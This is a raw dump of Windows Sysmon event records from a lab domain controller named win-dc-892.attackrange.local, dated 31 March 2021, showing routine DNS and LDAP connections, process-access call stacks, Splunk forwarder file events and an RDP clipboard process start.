AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58733- 354300x80000000000000004101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53567-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.255{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53567-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.253{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55108- 354300x80000000000000004098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.252{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53566-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.252{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-892.attackrange.local53566-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.249{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56348- 354300x80000000000000004095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.249{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-892.attackrange.local56348-false10.0.1.14win-dc-892.attackrange.local53domain 354300x80000000000000004094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.248{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56395- 10341000x80000000000000004093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.081{266CAFBE-64C1-6064-9300-00000000AE01}8721176C:\Windows\system32\LogonUI.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.003{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A4B8EF9C49EB16D2C1588A71BB03BB,SHA256=29008B313DE5D74F75085BD9938268E169A0027277682FA9961B96AA221191AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.980{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000004393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:11.980{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.964{266CAFBE-646C-6064-0F00-00000000AE01}1116812C:\Windows\System32\svchost.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+1982c|c:\windows\system32\termsrv.dll+2320b|c:\windows\system32\termsrv.dll+22643|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 154100x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.950{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 734700x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B25676CB0F5A0BE3DD45E36CC36C0C,SHA256=DFD36D0B32AA60B10A5126933FB9A7C2C9FE7C0510D94B191C2894E139EA2BD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.949{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.933{266CAFBE-646C-6064-1000-00000000AE01}11242344C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.933{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 